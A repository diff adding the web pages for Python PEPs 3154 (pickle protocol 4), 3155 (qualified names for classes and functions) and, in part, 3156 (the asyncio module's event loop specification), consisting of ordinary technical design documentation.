By default, pickle is only able to serialize module-global functions and +classes. Supporting other kinds of objects, such as unbound methods [4], +is a common request. Actually, third-party support for some of them, such +as bound methods, is implemented in the multiprocessing module [5].

+

The __qualname__ attribute from PEP 3155 makes it possible to look up many more objects by name. Making the STACK_GLOBAL opcode accept dot-separated names would allow the standard pickle implementation to support all those kinds of objects.

+
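In effect, STACK_GLOBAL with a dotted name performs a lookup along these lines; lookup_qualname is a hypothetical helper written for this illustration, not part of the pickle API:

import functools
import importlib

def lookup_qualname(module_name, qualname):
    # Walk the dot-separated qualified name starting from the module,
    # e.g. lookup_qualname('collections', 'OrderedDict.fromkeys').
    module = importlib.import_module(module_name)
    return functools.reduce(getattr, qualname.split('.'), module)

Note that names containing a <locals> component still cannot be resolved this way, since a function's local namespace is not reachable from the outside.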
+
+

64-bit opcodes for large objects

+

Current protocol versions export object sizes for various built-in +types (str, bytes) as 32-bit ints. This forbids serialization of +large data [1]. New opcodes are required to support very large bytes +and str objects.

+
+
+

Native opcodes for sets and frozensets

+

Many common built-in types (such as str, bytes, dict, list, tuple) have dedicated opcodes to improve resource consumption when serializing and deserializing them; however, sets and frozensets don't. Adding such opcodes would be an obvious improvement. Also, dedicated set support would make it possible to pickle self-referential sets, which is currently impossible [2].

+
+
+

Calling __new__ with keyword arguments

+

Currently, classes whose __new__ mandates the use of keyword-only +arguments can not be pickled (or, rather, unpickled) [3]. Both a new +special method (__getnewargs_ex__) and a new opcode (NEWOBJ_EX) +are needed. The __getnewargs_ex__ method, if it exists, must +return a two-tuple (args, kwargs) where the first item is the +tuple of positional arguments and the second item is the dict of +keyword arguments for the class’s __new__ method.

+
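For instance, a class of the following (hypothetical) shape becomes picklable under protocol 4 by providing __getnewargs_ex__:

import pickle

class Point:
    def __new__(cls, *, x, y):          # keyword-only arguments
        self = super().__new__(cls)
        self.x, self.y = x, y
        return self

    def __getnewargs_ex__(self):
        # (args, kwargs) to be passed to __new__ via NEWOBJ_EX.
        return (), {'x': self.x, 'y': self.y}

p = pickle.loads(pickle.dumps(Point(x=1, y=2), protocol=4))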
+
+

Better string encoding

+

Short str objects currently have their length coded as a 4-byte integer, which is wasteful. A specific opcode with a 1-byte length would make many pickles smaller.

+
+
+

Smaller memoization

+

The PUT opcodes all require an explicit index to select in which entry of the memo dictionary the top-of-stack is memoized. However, in practice those numbers are allocated in sequential order. A new opcode, MEMOIZE, will instead store the top-of-stack at the index equal to the current size of the memo dictionary. This allows for shorter pickles, since PUT opcodes are emitted for all non-atomic datatypes.

+
+
+
+

Summary of new opcodes

+

These reflect the state of the proposed implementation (thanks mostly +to Alexandre Vassalotti’s work):

+
    +
  • FRAME: introduce a new frame (followed by the 8-byte frame size +and the frame contents).
  • +
  • SHORT_BINUNICODE: push a utf8-encoded str object with a one-byte +size prefix (therefore less than 256 bytes long).
  • +
  • BINUNICODE8: push a utf8-encoded str object with an eight-byte +size prefix (for strings longer than 2**32 bytes, which therefore cannot +be serialized using BINUNICODE).
  • +
  • BINBYTES8: push a bytes object with an eight-byte size prefix +(for bytes objects longer than 2**32 bytes, which therefore cannot be +serialized using BINBYTES).
  • +
  • EMPTY_SET: push a new empty set object on the stack.
  • +
  • ADDITEMS: add the topmost stack items to the set (to be used with +EMPTY_SET).
  • +
  • FROZENSET: create a frozenset object from the topmost stack items, +and push it on the stack.
  • +
  • NEWOBJ_EX: take the three topmost stack items cls, args +and kwargs, and push the result of calling +cls.__new__(*args, **kwargs).
  • +
  • STACK_GLOBAL: take the two topmost stack items module_name and +qualname, and push the result of looking up the dotted qualname +in the module named module_name.
  • +
  • MEMOIZE: store the top-of-stack object in the memo dictionary with +an index equal to the current size of the memo dictionary.
  • +
+
+
+

Alternative ideas

+
+

Prefetching

+

Serhiy Storchaka suggested replacing framing with a special PREFETCH opcode (with a 2- or 4-byte argument) to declare known pickle chunks explicitly. Large data may be pickled outside such chunks. A naïve unpickler should be able to skip the PREFETCH opcode and still decode pickles properly, but good error handling would require checking that the PREFETCH length falls on an opcode boundary.

+
+
+
+

Acknowledgments

+

In alphabetic order:

+
    +
  • Alexandre Vassalotti, for starting the second PEP 3154 implementation [6]
  • +
  • Serhiy Storchaka, for discussing the framing proposal [6]
  • +
  • Stefan Mihaila, for starting the first PEP 3154 implementation as a +Google Summer of Code project mentored by Alexandre Vassalotti [7].
  • +
+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3154.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3155/index.html new file mode 100644 index 00000000000..cb5004c4c38 --- /dev/null +++ b/pep-3155/index.html @@ -0,0 +1,292 @@ + PEP 3155 – Qualified name for classes and functions | peps.python.org +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3155 – Qualified name for classes and functions

+
+
Author:
+
Antoine Pitrou <solipsis at pitrou.net>
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
29-Oct-2011
+
Python-Version:
+
3.3
+
Post-History:
+

+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Rationale

+

Python’s introspection facilities have long had poor support for +nested classes. Given a class object, it is impossible to know +whether it was defined inside another class or at module top-level; +and, if the former, it is also impossible to know in which class it +was defined. While use of nested classes is often considered poor +style, the only reason for them to have second class introspection +support is a lousy pun.

+

Python 3 adds insult to injury by dropping what was formerly known as +unbound methods. In Python 2, given the following definition:

+
class C:
+    def f():
+        pass
+
+
+

you can then walk up from the C.f object to its defining class:

+
>>> C.f.im_class
+<class '__main__.C'>
+
+
+

This possibility is gone in Python 3:

+
>>> C.f.im_class
+Traceback (most recent call last):
+  File "<stdin>", line 1, in <module>
+AttributeError: 'function' object has no attribute 'im_class'
+>>> dir(C.f)
+['__annotations__', '__call__', '__class__', '__closure__', '__code__',
+'__defaults__', '__delattr__', '__dict__', '__dir__', '__doc__',
+'__eq__', '__format__', '__ge__', '__get__', '__getattribute__',
+'__globals__', '__gt__', '__hash__', '__init__', '__kwdefaults__',
+'__le__', '__lt__', '__module__', '__name__', '__ne__', '__new__',
+'__reduce__', '__reduce_ex__', '__repr__', '__setattr__', '__sizeof__',
+'__str__', '__subclasshook__']
+
+
+

This again limits the introspection capabilities available to the user. It can produce actual issues when porting software to Python 3, for example in Twisted Core, where the issue of introspecting method objects came up several times. It also limits pickling support [1].

+
+
+

Proposal

+

This PEP proposes the addition of a __qualname__ attribute to +functions and classes. For top-level functions and classes, the +__qualname__ attribute is equal to the __name__ attribute. For +nested classes, methods, and nested functions, the __qualname__ +attribute contains a dotted path leading to the object from the module +top-level. A function’s local namespace is represented in that dotted +path by a component named <locals>.

+

The repr() and str() of functions and classes is modified to use +__qualname__ rather than __name__.

+
+

Example with nested classes

+
>>> class C:
+...   def f(): pass
+...   class D:
+...     def g(): pass
+...
+>>> C.__qualname__
+'C'
+>>> C.f.__qualname__
+'C.f'
+>>> C.D.__qualname__
+'C.D'
+>>> C.D.g.__qualname__
+'C.D.g'
+
+
+
+
+

Example with nested functions

+
>>> def f():
+...   def g(): pass
+...   return g
+...
+>>> f.__qualname__
+'f'
+>>> f().__qualname__
+'f.<locals>.g'
+
+
+
+
+
+

Limitations

+

With nested functions (and classes defined inside functions), the +dotted path will not be walkable programmatically as a function’s +namespace is not available from the outside. It will still be more +helpful to the human reader than the bare __name__.

+

Like the __name__ attribute, the __qualname__ attribute is computed statically and will not automatically follow rebinding.

+
+
+

Discussion

+
+

Excluding the module name

+

Like __name__, __qualname__ doesn't include the module name. This makes it independent of module aliasing and rebinding, and also allows computing it at compile time.

+
+
+

Reviving unbound methods

+

Reviving unbound methods would only solve a fraction of the problems this +PEP solves, at a higher price (an additional object type and an additional +indirection, rather than an additional attribute).

+
+
+
+

Naming choice

+

“Qualified name” is the best approximation, as a short phrase, of what the +additional attribute is about. It is not a “full name” or “fully qualified +name” since it (deliberately) does not include the module name. Calling +it a “path” would risk confusion with filesystem paths and the __file__ +attribute.

+

The first proposal for the attribute name was to call it __qname__ but +many people (who are not aware of previous use of such jargon in e.g. the +XML specification [2]) found it obscure and non-obvious, which is why the +slightly less short and more explicit __qualname__ was finally chosen.

+
+
+

References

+ +
+ +
+
+

Source: https://github.com/python/peps/blob/main/peps/pep-3155.rst

+

Last modified: 2023-09-09 17:39:29 GMT

+ +
+ +
+ + + + + \ No newline at end of file diff --git a/pep-3156/index.html new file mode 100644 index 00000000000..a0b33c07d6a --- /dev/null +++ b/pep-3156/index.html @@ -0,0 +1,2124 @@ + PEP 3156 – Asynchronous IO Support Rebooted: the “asyncio” Module | peps.python.org +
+
+

Python Enhancement Proposals

+ + +
+
+
+

PEP 3156 – Asynchronous IO Support Rebooted: the “asyncio” Module

+
+
Author:
+
Guido van Rossum <guido at python.org>
+
BDFL-Delegate:
+
Antoine Pitrou <antoine at python.org>
+
Discussions-To:
+
python-tulip@googlegroups.com
+
Status:
+
Final
+
Type:
+
Standards Track
+
Created:
+
12-Dec-2012
+
Python-Version:
+
3.3
+
Post-History:
+
21-Dec-2012
+
Replaces:
+
3153
+
Resolution:
+
Python-Dev message
+
+
+
+
Table of Contents +
+
+

Abstract

+

This is a proposal for asynchronous I/O in Python 3, starting at +Python 3.3. Consider this the concrete proposal that is missing from +PEP 3153. The proposal includes a pluggable event loop, transport and +protocol abstractions similar to those in Twisted, and a higher-level +scheduler based on yield from (PEP 380). The proposed package +name is asyncio.

+
+
+

Introduction

+
+

Status

+

A reference implementation exists under the code name Tulip. The +Tulip repo is linked from the References section at the end. Packages +based on this repo will be provided on PyPI (see References) to enable +using the asyncio package with Python 3.3 installations.

+

As of October 20th 2013, the asyncio package has been checked into +the Python 3.4 repository and released with Python 3.4-alpha-4, with +“provisional” API status. This is an expression of confidence and +intended to increase early feedback on the API, and not intended to +force acceptance of the PEP. The expectation is that the package will +keep provisional status in Python 3.4 and progress to final status in +Python 3.5. Development continues to occur primarily in the Tulip +repo, with changes occasionally merged into the CPython repo.

+
+
+

Dependencies

+

Python 3.3 is required for many of the proposed features. The +reference implementation (Tulip) requires no new language or standard +library features beyond Python 3.3, no third-party modules or +packages, and no C code, except for the (optional) IOCP support on +Windows.

+
+
+

Module Namespace

+

The specification here lives in a new top-level package, asyncio. +Different components live in separate submodules of the package. The +package will import common APIs from their respective submodules and +make them available as package attributes (similar to the way the +email package works). For such common APIs, the name of the submodule +that actually defines them is not part of the specification. Less +common APIs may have to explicitly be imported from their respective +submodule, and in this case the submodule name is part of the +specification.

+

Classes and functions defined without a submodule name are assumed to +live in the namespace of the top-level package. (But do not confuse +these with methods of various classes, which for brevity are also used +without a namespace prefix in certain contexts.)

+
+
+

Interoperability

+

The event loop is the place where most interoperability occurs. It should be easy for (Python 3.3 ports of) frameworks like Twisted, Tornado, or even gevent to either adapt the default event loop implementation to their needs using a lightweight adapter or proxy, or to replace the default event loop implementation with an adaptation of their own event loop implementation. (Some frameworks, like Twisted, have multiple event loop implementations. This should not be a problem since these all have the same interface.)

+

In most cases it should be possible for two different third-party +frameworks to interoperate, either by sharing the default event loop +implementation (each using its own adapter), or by sharing the event +loop implementation of either framework. In the latter case two +levels of adaptation would occur (from framework A’s event loop to the +standard event loop interface, and from there to framework B’s event +loop). Which event loop implementation is used should be under +control of the main program (though a default policy for event loop +selection is provided).

+

For this interoperability to be effective, the preferred direction of +adaptation in third party frameworks is to keep the default event loop +and adapt it to the framework’s API. Ideally all third party +frameworks would give up their own event loop implementation in favor +of the standard implementation. But not all frameworks may be +satisfied with the functionality provided by the standard +implementation.

+

In order to support both directions of adaptation, two separate APIs +are specified:

+
    +
  • An interface for managing the current event loop
  • +
  • The interface of a conforming event loop
  • +
+

An event loop implementation may provide additional methods and +guarantees, as long as these are called out in the documentation as +non-standard. An event loop implementation may also leave certain +methods unimplemented if they cannot be implemented in the given +environment; however, such deviations from the standard API should be +considered only as a last resort, and only if the platform or +environment forces the issue. (An example would be a platform where +there is a system event loop that cannot be started or stopped; see +“Embedded Event Loops” below.)

+

The event loop API does not depend on await/yield from. Rather, it uses +a combination of callbacks, additional interfaces (transports and +protocols), and Futures. The latter are similar to those defined in +PEP 3148, but have a different implementation and are not tied to +threads. In particular, the result() method raises an exception +instead of blocking when a result is not yet ready; the user is +expected to use callbacks (or await/yield from) to wait for the result.

+

All event loop methods specified as returning a coroutine are allowed +to return either a Future or a coroutine, at the implementation’s +choice (the standard implementation always returns coroutines). All +event loop methods documented as accepting coroutine arguments must +accept both Futures and coroutines for such arguments. (A convenience +function, ensure_future(), exists to convert an argument that is either a +coroutine or a Future into a Future.)

+

For users (like myself) who don’t like using callbacks, a scheduler is +provided for writing asynchronous I/O code as coroutines using the PEP +380 yield from or PEP 492 await expressions. +The scheduler is not pluggable; +pluggability occurs at the event loop level, and the standard +scheduler implementation should work with any conforming event loop +implementation. (In fact this is an important litmus test for +conforming implementations.)

+

For interoperability between code written using coroutines and other +async frameworks, the scheduler defines a Task class that behaves like a +Future. A framework that interoperates at the event loop level can +wait for a Future to complete by adding a callback to the Future. +Likewise, the scheduler offers an operation to suspend a coroutine +until a callback is called.

+

If such a framework cannot use the Future and Task classes as-is, it +may reimplement the loop.create_future() and +loop.create_task() methods. These should return objects +implementing (a superset of) the Future/Task interfaces.

+

A less ambitious framework may just call loop.set_task_factory() to replace the Task class without implementing its own event loop.

+

The event loop API provides limited interoperability with threads: +there is an API to submit a function to an executor (see PEP 3148) +which returns a Future that is compatible with the event loop, and +there is a method to schedule a callback with an event loop from +another thread in a thread-safe manner.

+
+
+

Transports and Protocols

+

For those not familiar with Twisted, a quick explanation of the +relationship between transports and protocols is in order. At the +highest level, the transport is concerned with how bytes are +transmitted, while the protocol determines which bytes to transmit +(and to some extent when).

+

A different way of saying the same thing: a transport is an +abstraction for a socket (or similar I/O endpoint) while a protocol is +an abstraction for an application, from the transport’s point of view.

+

Yet another view is simply that the transport and protocol interfaces +together define an abstract interface for using network I/O and +interprocess I/O.

+

There is almost always a 1:1 relationship between transport and +protocol objects: the protocol calls transport methods to send data, +while the transport calls protocol methods to pass it data that has +been received. Neither transport nor protocol methods “block” – they +set events into motion and then return.

+

The most common type of transport is a bidirectional stream transport. +It represents a pair of buffered streams (one in each direction) that +each transmit a sequence of bytes. The most common example of a +bidirectional stream transport is probably a TCP connection. Another +common example is an SSL/TLS connection. But there are some other things +that can be viewed this way, for example an SSH session or a pair of +UNIX pipes. Typically there aren’t many different transport +implementations, and most of them come with the event loop +implementation. However, there is no requirement that all transports +must be created by calling an event loop method: a third party module +may well implement a new transport and provide a constructor or +factory function for it that simply takes an event loop as an argument +or calls get_event_loop().

+

Note that transports don’t need to use sockets, not even if they use +TCP – sockets are a platform-specific implementation detail.

+

A bidirectional stream transport has two “ends”: one end talks to +the network (or another process, or whatever low-level interface it +wraps), and the other end talks to the protocol. The former uses +whatever API is necessary to implement the transport; but the +interface between transport and protocol is standardized by this PEP.

+

A protocol can represent some kind of “application-level” protocol +such as HTTP or SMTP; it can also implement an abstraction shared by +multiple protocols, or a whole application. A protocol’s primary +interface is with the transport. While some popular protocols (and +other abstractions) may have standard implementations, often +applications implement custom protocols. It also makes sense to have +libraries of useful third party protocol implementations that can be +downloaded and installed from PyPI.

+

There general notion of transport and protocol includes other +interfaces, where the transport wraps some other communication +abstraction. Examples include interfaces for sending and receiving +datagrams (e.g. UDP), or a subprocess manager. The separation of +concerns is the same as for bidirectional stream transports and +protocols, but the specific interface between transport and protocol +is different in each case.

+

Details of the interfaces defined by the various standard types of +transports and protocols are given later.

+
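As a concrete illustration of this division of labor, here is roughly the smallest useful protocol, written against the interfaces specified later in this PEP; the transport delivers received bytes to data_received(), and the protocol decides what to write back:

import asyncio

class EchoProtocol(asyncio.Protocol):
    def connection_made(self, transport):
        self.transport = transport   # keep the transport end around

    def data_received(self, data):
        # The protocol decides which bytes to transmit: echo them back.
        self.transport.write(data)

    def connection_lost(self, exc):
        pass                         # the connection is gone now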
+
+
+

Event Loop Interface Specification

+
+

Event Loop Policy: Getting and Setting the Current Event Loop

+

Event loop management is controlled by an event loop policy, which is +a global (per-process) object. There is a default policy, and an API +to change the policy. A policy defines the notion of context; a +policy manages a separate event loop per context. The default +policy’s notion of context is defined as the current thread.

+

Certain platforms or programming frameworks may change the default +policy to something more suitable to the expectations of the users of +that platform or framework. Such platforms or frameworks must +document their policy and at what point during their initialization +sequence the policy is set, in order to avoid undefined behavior when +multiple active frameworks want to override the default policy. +(See also “Embedded Event Loops” below.)

+

To get the event loop for current context, use get_event_loop(). +This returns an event loop object implementing the interface specified +below, or raises an exception in case no event loop has been set for +the current context and the current policy does not specify to create +one. It should never return None.

+

To set the event loop for the current context, use +set_event_loop(event_loop), where event_loop is an event loop +object, i.e. an instance of AbstractEventLoop, or None. +It is okay to set the current event loop to None, in +which case subsequent calls to get_event_loop() will raise an +exception. This is useful for testing code that should not depend on +the existence of a default event loop.

+

It is expected that get_event_loop() returns a different event loop object depending on the context (in fact, this is the definition of context). It may create a new event loop object if none is set and creation is allowed by the policy. The default policy will create a new event loop only in the main thread (as defined by threading.py, which uses a special subclass for the main thread), and only if get_event_loop() is called before set_event_loop() is ever called. (To reset this state, reset the policy.) In other threads an event loop must be explicitly set. Other policies may behave differently. Event loop creation by the default policy is lazy; i.e. the first call to get_event_loop() creates an event loop instance if necessary and if allowed by the current policy.

+

For the benefit of unit tests and other special cases there’s a third +policy function: new_event_loop(), which creates and returns a new +event loop object according to the policy’s default rules. To make +this the current event loop, you must call set_event_loop() with +it.

+

To change the event loop policy, call +set_event_loop_policy(policy), where policy is an event loop +policy object or None. If not None, the policy object must be +an instance of AbstractEventLoopPolicy that defines methods +get_event_loop(), set_event_loop(loop) and +new_event_loop(), all behaving like the functions described above.

+

Passing a policy value of None restores the default event loop +policy (overriding the alternate default set by the platform or +framework). The default event loop policy is an instance of the class +DefaultEventLoopPolicy. The current event loop policy object can +be retrieved by calling get_event_loop_policy().

+
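A short illustration of these policy functions, using the asyncio package names (a sketch of explicit loop management, not a recommended pattern for all applications):

import asyncio

loop = asyncio.new_event_loop()   # a fresh loop per the policy's rules
asyncio.set_event_loop(loop)      # make it current for this context
assert asyncio.get_event_loop() is loop
# ... use the loop ...
asyncio.set_event_loop(None)      # later get_event_loop() calls raise
loop.close()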

TBD: describe child watchers and UNIX quirks for subprocess processing.

+
+

Passing an Event Loop Around Explicitly

+

It is possible to write code that uses an event loop without relying on a global or per-thread default event loop. For this purpose, all APIs that need access to the current event loop (and aren't methods on an event class) take an optional keyword argument named loop. If this argument is None or unspecified, such APIs will call get_event_loop() to get the default event loop, but if the loop keyword argument is set to an event loop object, they will use that event loop, and pass it along to any other such APIs they call. For example, Future(loop=my_loop) will create a Future tied to the event loop my_loop. When the default current event loop is None, the loop keyword argument is effectively mandatory.

+

Note that an explicitly passed event loop must still belong to the +current thread; the loop keyword argument does not magically +change the constraints on how an event loop can be used.

+
+
+
+

Specifying Times

+

As usual in Python, all timeouts, intervals and delays are measured in +seconds, and may be ints or floats. However, absolute times are not +specified as POSIX timestamps. The accuracy, precision and epoch of +the clock are up to the implementation.

+

The default implementation uses time.monotonic(). Books could be +written about the implications of this choice. Better read the docs +for the standard library time module.

+
+
+

Embedded Event Loops

+

On some platforms an event loop is provided by the system. Such a +loop may already be running when the user code starts, and there may +be no way to stop or close it without exiting from the program. In +this case, the methods for starting, stopping and closing the event +loop may not be implementable, and is_running() may always return +True.

+
+
+

Event Loop Classes

+

There is no actual class named EventLoop. There is an +AbstractEventLoop class which defines all the methods without +implementations, and serves primarily as documentation. The following +concrete classes are defined:

+
    +
  • SelectorEventLoop is a concrete implementation of the full API +based on the selectors module (new in Python 3.4). The +constructor takes one optional argument, a selectors.Selector +object. By default an instance of selectors.DefaultSelector is +created and used.
  • +
  • ProactorEventLoop is a concrete implementation of the API except +for the I/O event handling and signal handling methods. It is only +defined on Windows (or on other platforms which support a similar +API for “overlapped I/O”). The constructor takes one optional +argument, a Proactor object. By default an instance of +IocpProactor is created and used. (The IocpProactor class +is not specified by this PEP; it is just an implementation +detail of the ProactorEventLoop class.)
  • +
+
+
+

Event Loop Methods Overview

+

The methods of a conforming event loop are grouped into several +categories. The first set of categories must be supported by all +conforming event loop implementations, with the exception that +embedded event loops may not implement the methods for starting, +stopping and closing. (However, a partially-conforming event loop is +still better than nothing. :-)

+
    +
  • Starting, stopping and closing: run_forever(), +run_until_complete(), stop(), is_running(), close(), +is_closed().
  • +
  • Basic and timed callbacks: call_soon(), call_later(), +call_at(), time().
  • +
  • Thread interaction: call_soon_threadsafe(), +run_in_executor(), set_default_executor().
  • +
  • Internet name lookups: getaddrinfo(), getnameinfo().
  • +
  • Internet connections: create_connection(), create_server(), +create_datagram_endpoint().
  • +
  • Wrapped socket methods: sock_recv(), sock_sendall(), +sock_connect(), sock_accept().
  • +
  • Tasks and futures support: create_future(), create_task(), +set_task_factory(), get_task_factory().
  • +
  • Error handling: get_exception_handler(), set_exception_handler(), +default_exception_handler(), call_exception_handler().
  • +
  • Debug mode: get_debug(), set_debug().
  • +
+

The second set of categories may be supported by conforming event +loop implementations. If not supported, they will raise +NotImplementedError. (In the default implementation, +SelectorEventLoop on UNIX systems supports all of these; +SelectorEventLoop on Windows supports the I/O event handling +category; ProactorEventLoop on Windows supports the pipes and +subprocess category.)

+
    +
  • I/O callbacks: add_reader(), remove_reader(), +add_writer(), remove_writer().
  • +
  • Pipes and subprocesses: connect_read_pipe(), +connect_write_pipe(), subprocess_shell(), +subprocess_exec().
  • +
  • Signal callbacks: add_signal_handler(), +remove_signal_handler().
  • +
+
+
+

Event Loop Methods

+
+

Starting, Stopping and Closing

+

An (unclosed) event loop can be in one of two states: running or +stopped. These methods deal with starting and stopping an event loop:

+
    +
  • run_forever(). Runs the event loop until stop() is called. +This cannot be called when the event loop is already running. (This +has a long name in part to avoid confusion with earlier versions of +this PEP, where run() had different behavior, in part because +there are already too many APIs that have a method named run(), +and in part because there shouldn’t be many places where this is +called anyway.)
  • +
  • run_until_complete(future). Runs the event loop until the +Future is done. If the Future is done, its result is returned, or +its exception is raised. This cannot be called when the event loop +is already running. +The method creates a new Task object if the +parameter is a coroutine.
  • +
  • stop(). Stops the event loop as soon as it is convenient. It +is fine to restart the loop with run_forever() or +run_until_complete() subsequently; no scheduled callbacks will +be lost if this is done. Note: stop() returns normally and the +current callback is allowed to continue. How soon after this point +the event loop stops is up to the implementation, but the intention +is to stop short of polling for I/O, and not to run any callbacks +scheduled in the future; the major freedom an implementation has is +how much of the “ready queue” (callbacks already scheduled with +call_soon()) it processes before stopping.
  • +
  • is_running(). Returns True if the event loop is currently +running, False if it is stopped.
  • +
  • close(). Closes the event loop, releasing any resources it may +hold, such as the file descriptor used by epoll() or +kqueue(), and the default executor. This should not be called +while the event loop is running. After it has been called the event +loop should not be used again. It may be called multiple times; +subsequent calls are no-ops.
  • +
  • is_closed(). Returns True if the event loop is closed, +False otherwise. (Primarily intended for error reporting; +please don’t implement functionality based on this method.)
  • +
+
+
+

Basic Callbacks

+

Callbacks associated with the same event loop are strictly serialized: +one callback must finish before the next one will be called. This is +an important guarantee: when two or more callbacks use or modify +shared state, each callback is guaranteed that while it is running, the +shared state isn’t changed by another callback.

+
    +
  • call_soon(callback, *args). This schedules a callback to be +called as soon as possible. Returns a Handle (see below) +representing the callback, whose cancel() method can be used to +cancel the callback. It guarantees that callbacks are called in the +order in which they were scheduled.
  • +
  • call_later(delay, callback, *args). Arrange for +callback(*args) to be called approximately delay seconds in +the future, once, unless cancelled. Returns a Handle representing +the callback, whose cancel() method can be used to cancel the +callback. Callbacks scheduled in the past or at exactly the same +time will be called in an undefined order.
  • +
  • call_at(when, callback, *args). This is like call_later(), +but the time is expressed as an absolute time. Returns a similar +Handle. There is a simple equivalency: loop.call_later(delay, +callback, *args) is the same as loop.call_at(loop.time() + +delay, callback, *args).
  • +
  • time(). Returns the current time according to the event loop’s +clock. This may be time.time() or time.monotonic() or some +other system-specific clock, but it must return a float expressing +the time in units of approximately one second since some epoch. +(No clock is perfect – see PEP 418.)
  • +
+

Note: A previous version of this PEP defined a method named call_repeatedly(), which promised to call a callback at regular intervals. This has been withdrawn because the design of such a function is overspecified. On the one hand, a simple timer loop can easily be emulated using a callback that reschedules itself using call_later(); it is also easy to write a coroutine containing a loop and a sleep() call (a toplevel function in the module, see below). On the other hand, due to the complexities of accurate timekeeping there are many traps and pitfalls here for the unaware (see PEP 418), and different use cases require different behavior in edge cases. It is impossible to offer an API for this purpose that is bullet-proof in all cases, so it is deemed better to let application designers decide for themselves what kind of timer loop to implement.

+
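For instance, the self-rescheduling timer loop mentioned in the note above takes only a few lines (an illustrative sketch):

import asyncio

def tick(loop, interval):
    print("tick at", loop.time())
    # Emulate a timer loop: the callback reschedules itself.
    loop.call_later(interval, tick, loop, interval)

loop = asyncio.new_event_loop()
loop.call_soon(tick, loop, 1.0)
loop.call_later(3.5, loop.stop)   # let a few ticks run, then stop
loop.run_forever()
loop.close()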
+
+

Thread interaction

+
    +
  • call_soon_threadsafe(callback, *args). Like +call_soon(callback, *args), but when called from another thread +while the event loop is blocked waiting for I/O, unblocks the event +loop. Returns a Handle. This is the only method that is safe +to call from another thread. (To schedule a callback for a later +time in a threadsafe manner, you can use +loop.call_soon_threadsafe(loop.call_later, when, callback, +*args).) Note: this is not safe to call from a signal handler +(since it may use locks). In fact, no API is signal-safe; if you +want to handle signals, use add_signal_handler() described +below.
  • +
• run_in_executor(executor, callback, *args). Arrange to call callback(*args) in an executor (see PEP 3148). Returns an asyncio.Future instance whose result on success is the return value of that call. This is equivalent to wrap_future(executor.submit(callback, *args)). If executor is None, the default executor set by set_default_executor() is used. If no default executor has been set yet, a ThreadPoolExecutor with a default number of threads is created and set as the default executor. (The default implementation uses 5 threads in this case.) A usage sketch follows this list.
  • +
  • set_default_executor(executor). Set the default executor used +by run_in_executor(). The argument must be a PEP 3148 +Executor instance or None, in order to reset the default +executor.
  • +
+
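The sketch below offloads a blocking call with run_in_executor(); blocking_io is a stand-in for any function that would otherwise block the loop:

import asyncio
import time

def blocking_io():
    time.sleep(0.1)   # stands in for an arbitrary blocking call
    return 42

async def main(loop):
    # Passing None selects the default executor (a ThreadPoolExecutor).
    result = await loop.run_in_executor(None, blocking_io)
    print(result)

loop = asyncio.new_event_loop()
loop.run_until_complete(main(loop))
loop.close()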

See also the wrap_future() function described in the section about +Futures.

+
+
+

Internet name lookups

+

These methods are useful if you want to connect or bind a socket to an +address without the risk of blocking for the name lookup. They are +usually called implicitly by create_connection(), +create_server() or create_datagram_endpoint().

+
    +
  • getaddrinfo(host, port, family=0, type=0, proto=0, flags=0). +Similar to the socket.getaddrinfo() function but returns a +Future. The Future’s result on success will be a list of the same +format as returned by socket.getaddrinfo(), i.e. a list of +(address_family, socket_type, socket_protocol, canonical_name, +address) where address is a 2-tuple (ipv4_address, port) +for IPv4 addresses and a 4-tuple (ipv6_address, port, flow_info, +scope_id) for IPv6 addresses. If the family argument is zero +or unspecified, the list returned may contain a mixture of IPv4 and +IPv6 addresses; otherwise the addresses returned are constrained by +the family value (similar for proto and flags). The +default implementation calls socket.getaddrinfo() using +run_in_executor(), but other implementations may choose to +implement their own DNS lookup. The optional arguments must be +specified as keyword arguments.

    Note: implementations are allowed to implement a subset of the full +socket.getaddrinfo() interface; e.g. they may not support symbolic +port names, or they may ignore or incompletely implement the +type, proto and flags arguments. However, if type +and proto are ignored, the argument values passed in should be +copied unchanged into the return tuples’ socket_type and +socket_protocol elements. (You can’t ignore family, since +IPv4 and IPv6 addresses must be looked up differently. The only +permissible values for family are socket.AF_UNSPEC (0), +socket.AF_INET and socket.AF_INET6, and the latter only if +it is defined by the platform.)

    +
  • +
  • getnameinfo(sockaddr, flags=0). Similar to +socket.getnameinfo() but returns a Future. The Future’s result +on success will be a tuple (host, port). Same implementation +remarks as for getaddrinfo().
  • +
+
+
+

Internet connections

+

These are the high-level interfaces for managing internet connections. +Their use is recommended over the corresponding lower-level interfaces +because they abstract away the differences between selector-based +and proactor-based event loops.

+

Note that the client and server side of stream connections use the +same transport and protocol interface. However, datagram endpoints +use a different transport and protocol interface.

+
    +
  • create_connection(protocol_factory, host, port, <options>). +Creates a stream connection to a given internet host and port. This +is a task that is typically called from the client side of the +connection. It creates an implementation-dependent bidirectional +stream Transport to represent the connection, then calls +protocol_factory() to instantiate (or retrieve) the user’s +Protocol implementation, and finally ties the two together. (See +below for the definitions of Transport and Protocol.) The user’s +Protocol implementation is created or retrieved by calling +protocol_factory() without arguments(*). The coroutine’s result +on success is the (transport, protocol) pair; if a failure +prevents the creation of a successful connection, an appropriate +exception will be raised. Note that when the coroutine completes, +the protocol’s connection_made() method has not yet been called; +that will happen when the connection handshake is complete.

    (*) There is no requirement that protocol_factory is a class. +If your protocol class needs to have specific arguments passed to +its constructor, you can use lambda. +You can also pass a trivial lambda that returns a previously +constructed Protocol instance.

    +

    The <options> are all specified using optional keyword arguments:

    +
      +
    • ssl: Pass True to create an SSL/TLS transport (by default +a plain TCP transport is created). Or pass an ssl.SSLContext +object to override the default SSL context object to be used. If +a default context is created it is up to the implementation to +configure reasonable defaults. The reference implementation +currently uses PROTOCOL_SSLv23 and sets the OP_NO_SSLv2 +option, calls set_default_verify_paths() and sets verify_mode +to CERT_REQUIRED. In addition, whenever the context (default +or otherwise) specifies a verify_mode of CERT_REQUIRED or +CERT_OPTIONAL, if a hostname is given, immediately after a +successful handshake ssl.match_hostname(peercert, hostname) is +called, and if this raises an exception the connection is closed. +(To avoid this behavior, pass in an SSL context that has +verify_mode set to CERT_NONE. But this means you are not +secure, and vulnerable to for example man-in-the-middle attacks.)
    • +
